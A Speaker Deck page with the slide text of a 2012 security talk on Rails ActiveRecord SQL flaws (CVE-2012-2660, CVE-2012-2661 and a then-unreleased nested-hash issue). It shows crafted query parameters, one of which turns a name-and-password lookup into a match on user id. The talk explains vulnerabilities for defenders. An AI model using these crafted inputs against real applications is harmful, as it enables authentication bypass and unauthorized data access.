Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
83
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
160
The Evolution of Rails Security
presidentbeef
1
850
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
160
Practical Static Analysis for Continuous Application Security
presidentbeef
0
230
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
480
Continuous Security with Practical Static Analysis
presidentbeef
1
350
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
270
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.2k
Tales from the Crypt
presidentbeef
1
270
Other Decks in Programming
See All in Programming
エンジニアの「手元の自動化」を加速するn8n 2026.02.27
symy2co
0
180
RailsのValidatesをSwift Macrosで再現してみた
hokuron
0
130
Angular-Apps smarter machen mit Gen AI: Lokal und offlinefähig - Hands-on Workshop!
christianliebel
PRO
0
130
[PHPerKaigi 2026]PHPerKaigi2025の企画CodeGolfが最高すぎて社内で内製して半年運営して得た内製と運営の知見
ikezoemakoto
0
280
Feature Toggle は捨てやすく使おう
gennei
0
330
PHP 7.4でもOpenTelemetryゼロコード計装がしたい! / PHPerKaigi 2026
arthur1
1
400
ロボットのための工場に灯りは要らない
watany
12
3.2k
Agentic AI: Evolution oder Revolution
mobilelarson
PRO
0
190
脱 雰囲気実装! AgentCoreを良い感じに WEBアプリケーションに組み込むために
takuyay0ne
3
390
AI Assistants for Your Angular Solutions
manfredsteyer
PRO
0
160
PHPで TLSのプロトコルを実装してみる
higaki_program
0
430
20260313 - Grafana & Friends Taipei #1 - Kubernetes v1.36 的開發雜記:那些困在 Alpha 加護病房太久的 Metrics
tico88612
0
230
Featured
See All Featured
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
34
2.7k
Believing is Seeing
oripsolob
1
94
Between Models and Reality
mayunak
2
240
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
360
30k
Bash Introduction
62gerente
615
210k
Statistics for Hackers
jakevdp
799
230k
How To Speak Unicorn (iThemes Webinar)
marktimemedia
1
410
The Anti-SEO Checklist Checklist. Pubcon Cyber Week
ryanjones
0
100
The Hidden Cost of Media on the Web [PixelPalooza 2025]
tammyeverts
2
250
SEO in 2025: How to Prepare for the Future of Search
ipullrank
3
3.4k
Context Engineering - Making Every Token Count
addyosmani
9
770
RailsConf 2023
tenderlove
30
1.4k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1
presidentbeef
symy2co
hokuron
christianliebel
ikezoemakoto
gennei
.jpeg){kind=avatar}
arthur1
watany
mobilelarson
takuyay0ne
manfredsteyer
higaki_program
tico88612
jcasabona
oripsolob
mayunak
bermonpainter
62gerente
jakevdp
marktimemedia
ryanjones
tammyeverts
ipullrank
addyosmani
tenderlove
![ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_2.jpg){kind=link}
![Query Parameters ?name[] {"name"=>[nil]}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_3.jpg){kind=link}
![ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_4.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_7.jpg){kind=link}
![ActiveRecord Query User.where("users.name" => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_8.jpg){kind=link}
![Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_9.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name], :password => params[:password])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_13.jpg){kind=link}
![Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_14.jpg){kind=link}
